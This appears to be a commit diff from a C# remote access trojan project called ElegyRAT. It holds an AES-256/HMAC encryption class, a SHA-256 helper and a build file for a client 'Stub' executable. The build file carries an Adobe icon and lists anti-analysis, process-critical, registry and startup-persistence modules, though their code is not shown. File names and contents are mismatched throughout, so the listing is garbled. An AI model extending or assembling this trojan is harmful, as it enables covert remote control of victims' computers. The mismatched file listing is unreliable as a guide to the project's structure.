We1h0

Initial upload

Author: we1h0

ElegyRAT-C-Sharp/.vs/ElegyRAT-Sharp/v16/.suo

@@ -0,0 +1,153 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Runtime.CompilerServices;
+using System.Security.Cryptography;
+using System.Text;
+
+namespace Client.Algorithm
+{
+        public class Aes256
+        {
+            private const int KeyLength = 32;
+            private const int AuthKeyLength = 64;
+            private const int IvLength = 16;
+            private const int HmacSha256Length = 32;
+            private readonly byte[] _key;
+            private readonly byte[] _authKey;
+
+            private static readonly byte[] Salt =
+            {
+            0xBF, 0xEB, 0x1E, 0x56, 0xFB, 0xCD, 0x97, 0x3B, 0xB2, 0x19, 0x2, 0x24, 0x30, 0xA5, 0x78, 0x43, 0x0, 0x3D, 0x56,
+            0x44, 0xD2, 0x1E, 0x62, 0xB9, 0xD4, 0xF1, 0x80, 0xE7, 0xE6, 0xC3, 0x39, 0x41
+        };
+
+            public Aes256(string masterKey)
+            {
+                if (string.IsNullOrEmpty(masterKey))
+                    throw new ArgumentException($"{nameof(masterKey)} can not be null or empty.");
+
+                using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(masterKey, Salt, 50000))
+                {
+                    _key = derive.GetBytes(KeyLength);
+                    _authKey = derive.GetBytes(AuthKeyLength);
+                }
+            }
+
+            public string Encrypt(string input)
+            {
+                return Convert.ToBase64String(Encrypt(Encoding.UTF8.GetBytes(input)));
+            }
+
+            /* FORMAT
+             * ----------------------------------------
+             * |     HMAC     |   IV   |  CIPHERTEXT  |
+             * ----------------------------------------
+             *     32 bytes    16 bytes
+             */
+            public byte[] Encrypt(byte[] input)
+            {
+                if (input == null)
+                    throw new ArgumentNullException($"{nameof(input)} can not be null.");
+
+                using (var ms = new MemoryStream())
+                {
+                    ms.Position = HmacSha256Length; // reserve first 32 bytes for HMAC
+                    using (var aesProvider = new AesCryptoServiceProvider())
+                    {
+                        aesProvider.KeySize = 256;
+                        aesProvider.BlockSize = 128;
+                        aesProvider.Mode = CipherMode.CBC;
+                        aesProvider.Padding = PaddingMode.PKCS7;
+                        aesProvider.Key = _key;
+                        aesProvider.GenerateIV();
+
+                        using (var cs = new CryptoStream(ms, aesProvider.CreateEncryptor(), CryptoStreamMode.Write))
+                        {
+                            ms.Write(aesProvider.IV, 0, aesProvider.IV.Length); // write next 16 bytes the IV, followed by ciphertext
+                            cs.Write(input, 0, input.Length);
+                            cs.FlushFinalBlock();
+
+                            using (var hmac = new HMACSHA256(_authKey))
+                            {
+                                byte[] hash = hmac.ComputeHash(ms.ToArray(), HmacSha256Length, ms.ToArray().Length - HmacSha256Length); // compute the HMAC of IV and ciphertext
+                                ms.Position = 0; // write hash at beginning
+                                ms.Write(hash, 0, hash.Length);
+                            }
+                        }
+                    }
+
+                    return ms.ToArray();
+                }
+            }
+
+            public string Decrypt(string input)
+            {
+                return Encoding.UTF8.GetString(Decrypt(Convert.FromBase64String(input)));
+            }
+
+            public byte[] Decrypt(byte[] input)
+            {
+                if (input == null)
+                    throw new ArgumentNullException($"{nameof(input)} can not be null.");
+
+                using (var ms = new MemoryStream(input))
+                {
+                    using (var aesProvider = new AesCryptoServiceProvider())
+                    {
+                        aesProvider.KeySize = 256;
+                        aesProvider.BlockSize = 128;
+                        aesProvider.Mode = CipherMode.CBC;
+                        aesProvider.Padding = PaddingMode.PKCS7;
+                        aesProvider.Key = _key;
+
+                        // read first 32 bytes for HMAC
+                        using (var hmac = new HMACSHA256(_authKey))
+                        {
+                            var hash = hmac.ComputeHash(ms.ToArray(), HmacSha256Length, ms.ToArray().Length - HmacSha256Length);
+                            byte[] receivedHash = new byte[HmacSha256Length];
+                            ms.Read(receivedHash, 0, receivedHash.Length);
+
+                            if (!AreEqual(hash, receivedHash))
+                                throw new CryptographicException("Invalid message authentication code (MAC).");
+                        }
+
+                        byte[] iv = new byte[IvLength];
+                        ms.Read(iv, 0, IvLength); // read next 16 bytes for IV, followed by ciphertext
+                        aesProvider.IV = iv;
+
+                        using (var cs = new CryptoStream(ms, aesProvider.CreateDecryptor(), CryptoStreamMode.Read))
+                        {
+                            byte[] temp = new byte[ms.Length - IvLength + 1];
+                            byte[] data = new byte[cs.Read(temp, 0, temp.Length)];
+                            Buffer.BlockCopy(temp, 0, data, 0, data.Length);
+                            return data;
+                        }
+                    }
+                }
+            }
+
+            /// <summary>
+            /// Compares two byte arrays for equality.
+            /// </summary>
+            /// <param name="a1">Byte array to compare</param>
+            /// <param name="a2">Byte array to compare</param>
+            /// <returns>True if equal, else false</returns>
+            /// <remarks>
+            /// Assumes that the byte arrays have the same length.
+            /// This method is safe against timing attacks.
+            /// </remarks>
+            [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
+            private bool AreEqual(byte[] a1, byte[] a2)
+            {
+                bool result = true;
+                for (int i = 0; i < a1.Length; ++i)
+                {
+                    if (a1[i] != a2[i])
+                        result = false;
+                }
+                return result;
+            }
+        }
+    }

ElegyRAT-C-Sharp/Client/2.ico

@@ -0,0 +1,33 @@
+using System.Security.Cryptography;
+using System.Text;
+
+namespace Client.Algorithm
+{
+    public static class Sha256
+    {
+        public static string ComputeHash(string input)
+        {
+            byte[] data = Encoding.UTF8.GetBytes(input);
+
+            using (SHA256Managed sha = new SHA256Managed())
+            {
+                data = sha.ComputeHash(data);
+            }
+
+            StringBuilder hash = new StringBuilder();
+
+            foreach (byte _byte in data)
+                hash.Append(_byte.ToString("X2"));
+
+            return hash.ToString().ToUpper();
+        }
+
+        public static byte[] ComputeHash(byte[] input)
+        {
+            using (SHA256Managed sha = new SHA256Managed())
+            {
+                return sha.ComputeHash(input);
+            }
+        }
+    }
+}

ElegyRAT-C-Sharp/Client/Algorithm/Aes256.cs

@@ -0,0 +1,167 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <Import Project="..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props" Condition="Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" />
+  <Import Project="..\packages\ILMerge.3.0.29\build\ILMerge.props" Condition="Exists('..\packages\ILMerge.3.0.29\build\ILMerge.props')" />
+  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{C3C49F45-2589-4E04-9C50-71B6035C14AE}</ProjectGuid>
+    <OutputType>WinExe</OutputType>
+    <RootNamespace>Client</RootNamespace>
+    <AssemblyName>Stub</AssemblyName>
+    <TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
+    <FileAlignment>512</FileAlignment>
+    <Deterministic>true</Deterministic>
+    <TargetFrameworkProfile>Client</TargetFrameworkProfile>
+    <IsWebBootstrapper>false</IsWebBootstrapper>
+    <NuGetPackageImportStamp>
+    </NuGetPackageImportStamp>
+    <PublishUrl>publish\</PublishUrl>
+    <Install>true</Install>
+    <InstallFrom>Disk</InstallFrom>
+    <UpdateEnabled>false</UpdateEnabled>
+    <UpdateMode>Foreground</UpdateMode>
+    <UpdateInterval>7</UpdateInterval>
+    <UpdateIntervalUnits>Days</UpdateIntervalUnits>
+    <UpdatePeriodically>false</UpdatePeriodically>
+    <UpdateRequired>false</UpdateRequired>
+    <MapFileExtensions>true</MapFileExtensions>
+    <ApplicationRevision>0</ApplicationRevision>
+    <ApplicationVersion>1.0.0.%2a</ApplicationVersion>
+    <UseApplicationTrust>false</UseApplicationTrust>
+    <BootstrapperEnabled>true</BootstrapperEnabled>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>x86</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>..\Binaries\Debug\Stub\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+    <DocumentationFile>
+    </DocumentationFile>
+    <AllowUnsafeBlocks>false</AllowUnsafeBlocks>
+    <GenerateSerializationAssemblies>Auto</GenerateSerializationAssemblies>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>x86</PlatformTarget>
+    <DebugType>none</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>..\Binaries\Release\Stub\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+    <AllowUnsafeBlocks>false</AllowUnsafeBlocks>
+    <GenerateSerializationAssemblies>Auto</GenerateSerializationAssemblies>
+    <DebugSymbols>false</DebugSymbols>
+  </PropertyGroup>
+  <PropertyGroup>
+    <StartupObject />
+  </PropertyGroup>
+  <PropertyGroup />
+  <PropertyGroup>
+    <ApplicationManifest>app.manifest</ApplicationManifest>
+  </PropertyGroup>
+  <PropertyGroup>
+    <SignManifests>false</SignManifests>
+  </PropertyGroup>
+  <PropertyGroup>
+    <ManifestCertificateThumbprint>42D511BFB6981EC00B5DE797DBC5B50B8C1C9140</ManifestCertificateThumbprint>
+  </PropertyGroup>
+  <PropertyGroup>
+    <ManifestKeyFile>fql.pfx</ManifestKeyFile>
+  </PropertyGroup>
+  <PropertyGroup>
+    <SignAssembly>false</SignAssembly>
+  </PropertyGroup>
+  <PropertyGroup>
+    <AssemblyOriginatorKeyFile>
+    </AssemblyOriginatorKeyFile>
+  </PropertyGroup>
+  <PropertyGroup>
+    <ManifestTimestampUrl>http://timestamp.globalsign.com/scripts/timestamp.dll</ManifestTimestampUrl>
+  </PropertyGroup>
+  <PropertyGroup>
+    <ApplicationIcon>adobe_128px_1210214_easyicon.net.ico</ApplicationIcon>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="Microsoft.VisualBasic" />
+    <Reference Include="Microsoft.Win32.TaskScheduler, Version=2.9.0.0, Culture=neutral, PublicKeyToken=e25603a88b3aa7da, processorArchitecture=MSIL">
+      <HintPath>..\packages\TaskScheduler.2.9.0\lib\net40\Microsoft.Win32.TaskScheduler.dll</HintPath>
+    </Reference>
+    <Reference Include="System" />
+    <Reference Include="Microsoft.CSharp" />
+    <Reference Include="System.Data" />
+    <Reference Include="System.Drawing" />
+    <Reference Include="System.Management" />
+    <Reference Include="System.Security" />
+    <Reference Include="System.Windows.Forms" />
+    <Reference Include="System.XML" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="Algorithm\Aes256.cs" />
+    <Compile Include="Algorithm\Sha256.cs" />
+    <Compile Include="Handle Packet\Packet.cs" />
+    <Compile Include="Helper\Anti_Analysis.cs" />
+    <Compile Include="Helper\HwidGen.cs" />
+    <Compile Include="Helper\IdSender.cs" />
+    <Compile Include="Helper\Methods.cs" />
+    <Compile Include="Helper\MutexControl.cs" />
+    <Compile Include="Helper\NativeMethods.cs" />
+    <Compile Include="Helper\ProcessCritical.cs" />
+    <Compile Include="Helper\SetRegistry.cs" />
+    <Compile Include="Install\NormalStartup.cs" />
+    <Compile Include="Program.cs" />
+    <Compile Include="Properties\AssemblyInfo.cs" />
+    <Compile Include="Settings.cs" />
+    <Compile Include="Connection\ClientSocket.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="app.config" />
+    <None Include="app.manifest" />
+    <None Include="ILMerge.props" />
+    <None Include="packages.config" />
+  </ItemGroup>
+  <ItemGroup>
+    <BootstrapperPackage Include="Microsoft.Net.Framework.3.5.SP1">
+      <Visible>False</Visible>
+      <ProductName>.NET Framework 3.5 SP1</ProductName>
+      <Install>false</Install>
+    </BootstrapperPackage>
+  </ItemGroup>
+  <ItemGroup>
+    <Content Include="2.ico" />
+    <Content Include="adobe_128px_1210214_easyicon.net.ico" />
+    <Content Include="ILMergeOrder.txt" />
+  </ItemGroup>
+  <ItemGroup>
+    <ProjectReference Include="..\MessagePack\MessagePackLib.csproj">
+      <Project>{dc199d9e-cf10-41dd-bbcd-98e71ba8679d}</Project>
+      <Name>MessagePackLib</Name>
+    </ProjectReference>
+  </ItemGroup>
+  <ItemGroup>
+    <COMReference Include="TaskScheduler">
+      <Guid>{E34CB9F1-C7F7-424C-BE29-027DCC09363A}</Guid>
+      <VersionMajor>1</VersionMajor>
+      <VersionMinor>0</VersionMinor>
+      <Lcid>0</Lcid>
+      <WrapperTool>tlbimp</WrapperTool>
+      <Isolated>False</Isolated>
+      <EmbedInteropTypes>True</EmbedInteropTypes>
+    </COMReference>
+  </ItemGroup>
+  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+  <Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
+    <PropertyGroup>
+      <ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them.  For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
+    </PropertyGroup>
+    <Error Condition="!Exists('..\packages\ILMerge.3.0.29\build\ILMerge.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\ILMerge.3.0.29\build\ILMerge.props'))" />
+    <Error Condition="!Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props'))" />
+    <Error Condition="!Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets'))" />
+  </Target>
+  <Import Project="..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets" Condition="Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" />
+</Project>

ElegyRAT-C-Sharp/Client/Algorithm/Sha256.cs

@@ -0,0 +1,13 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup>
+    <PublishUrlHistory>publish\</PublishUrlHistory>
+    <InstallUrlHistory />
+    <SupportUrlHistory />
+    <UpdateUrlHistory />
+    <BootstrapperUrlHistory />
+    <ErrorReportUrlHistory />
+    <FallbackCulture>zh-CN</FallbackCulture>
+    <VerifyUploadedFiles>false</VerifyUploadedFiles>
+  </PropertyGroup>
+</Project>